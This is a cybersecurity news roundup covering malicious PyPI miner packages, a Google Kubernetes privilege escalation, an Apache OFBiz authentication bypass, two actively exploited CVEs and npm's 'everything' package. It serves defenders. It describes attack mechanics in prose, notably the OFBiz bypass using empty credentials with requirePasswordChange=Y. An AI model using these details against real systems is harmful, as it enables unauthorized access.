12/27/2023-01/04/2024 3 Malicious PyPI Packages, Privilege Escalation Flaw Impacting Kubernetes Service, Critical Zero-Day in Apache OfBiz ERP System And More.

1. Beware: 3 Malicious PyPI Packages Found Targeting Linux with Crypto Miners

Three new malicious packages have been discovered in the Python Package Index (PyPI) open-source repository with capabilities to deploy a cryptocurrency miner on affected Linux devices. The three harmful packages, named modularseven, driftme, and catme, attracted a total of 431 downloads over the past month before they were taken down. These packages, upon initial use, deploy a CoinMiner executable on Linux devices. The malicious code resides in the __init__.py file, which decodes and retrieves the first stage from a remote server, a shell script (“unmi.sh”) that fetches a configuration file for the mining activity as well as the CoinMiner file hosted on GitLab. The ELF binary file is then executed in the background using the nohup command, thus ensuring that the process continues to run after exiting the session. Echoing the approach of the earlier ‘culturestreak’ package, these packages conceal their payload, effectively reducing the detectability of their malicious code by hosting it on a remote URL.

2. Google Cloud Resolves Privilege Escalation Flaw Impacting Kubernetes Service

Google Cloud has addressed a medium-severity security flaw in its platform that could be abused by an attacker who already has access to a Kubernetes cluster to escalate their privileges. An attacker who has compromised the Fluent Bit logging container could combine that access with high privileges required by Anthos Service Mesh (on clusters that have enabled it) to escalate privileges in the cluster. Palo Alto Networks Unit 42, which discovered and reported the shortcoming, said adversaries could weaponize it to carry out “data theft, deploy malicious pods, and disrupt the cluster’s operations.” A key prerequisite to successfully exploiting the vulnerability hinges on an attacker having already compromised a FluentBit container by some other initial access methods, such as via a remote code execution flaw. A threat actor could use this access to gain privileged access to a Kubernetes cluster that has ASM enabled and then subsequently use ASM’s service account token to escalate their privileges by creating a new pod with cluster-admin privileges. By way of fixes, Google has removed Fluent Bit’s access to the service account tokens and re-architected the functionality of ASM to remove excessive role-based access control (RBAC) permissions.

3. Critical Zero-Day in Apache OfBiz ERP System Exposes Businesses to Attack

A new zero-day security flaw has been discovered in Apache OfBiz, an open-source Enterprise Resource Planning (ERP) system that could be exploited to bypass authentication protections. The vulnerability, tracked as CVE-2023-51467, resides in the login functionality and is the result of an incomplete patch for another critical vulnerability (CVE-2023-49070, CVSS score: 9.8) that was released earlier this month. CVE-2023-51467 could be triggered using empty and invalid USERNAME and PASSWORD parameters in an HTTP request to return an authentication success message, effectively circumventing the protection and enabling a threat actor to access otherwise unauthorized internal resources. The attack hinges on the fact that the parameter “requirePasswordChange” is set to “Y” (i.e., yes) in the URL, causing the authentication to be trivially bypassed regardless of the values passed in the username and password fields. It is imperative that users move quickly to secure their Apache OFBiz instances against the two vulnerabilities.

4. CISA warns of actively exploited bugs in Chrome and Excel parsing library

The first issue that CISA added to its Known Exploited Vulnerabilities (KEV) is CVE-2023-7101, a remote code execution vulnerability that affects versions 0.65 and older of the Spreadsheet::ParseExcel library. Spreadsheet::ParseExcel contains a remote code execution vulnerability due to passing unvalidated input from a file into a string-type “eval.” Specifically, the issue stems from the evaluation of Number format strings within the Excel parsing logic. One product using the open-source library is Barracuda ESG (Email Security Gateway), which has been targeted in late December by Chinese hackers who exploited the CVE-2023-7101 in Spreadsheet::ParseExcel to compromise appliances. The latest actively exploited vulnerability added to KEV is CVE-2023-7024, a heap buffer overflow issue in WebRTC in Google Chrome web browser. Google Chromium WebRTC contains a heap buffer overflow vulnerability that allows an attacker to cause crashes or code execution. This vulnerability could impact web browsers using WebRTC, including but not limited to Google Chrome. The flaw was discovered by Google’s Threat Analysis Group (TAG) and received a fix via an emergency update on December 20, in versions 120.0.6099.129/130 for Windows and 120.0.6099.129 for Mac and Linux.

5. ‘everything’ blocks devs from removing their own npm packages

Over the holidays, the npm package registry was flooded with more than 3,000 packages, including one called “everything,” and others named a variation of the word. Installing everything could have just caused your computer to potentially fall short of storage space and slow down, but the package’s mere existence on npmjs.com prevents authors—unrelated to this package whatsoever, from unpublishing their packages from the world’s largest JavaScript software registry. The “everything” package has just 5 sub-packages, published under the “@everything-registry” scope, listed as its dependencies.  These 5 packages, however, gradually manage to pull in every single package present on the entire registry as a dependency. For example, “everything” pulls in “@everything-registry/chunk-2,” which may further attempt to pull in several other packages by the same author, such as “@everything-registry/sub-chunk-1623.” Each of these sub-packages (or “chunks” as the author calls them), ultimately includes about 800 npm projects as their dependency.  The problem is, since ‘everything’ relies on every package (including yours), your package gets stuck, and there’s some unknown package preventing you from removing it.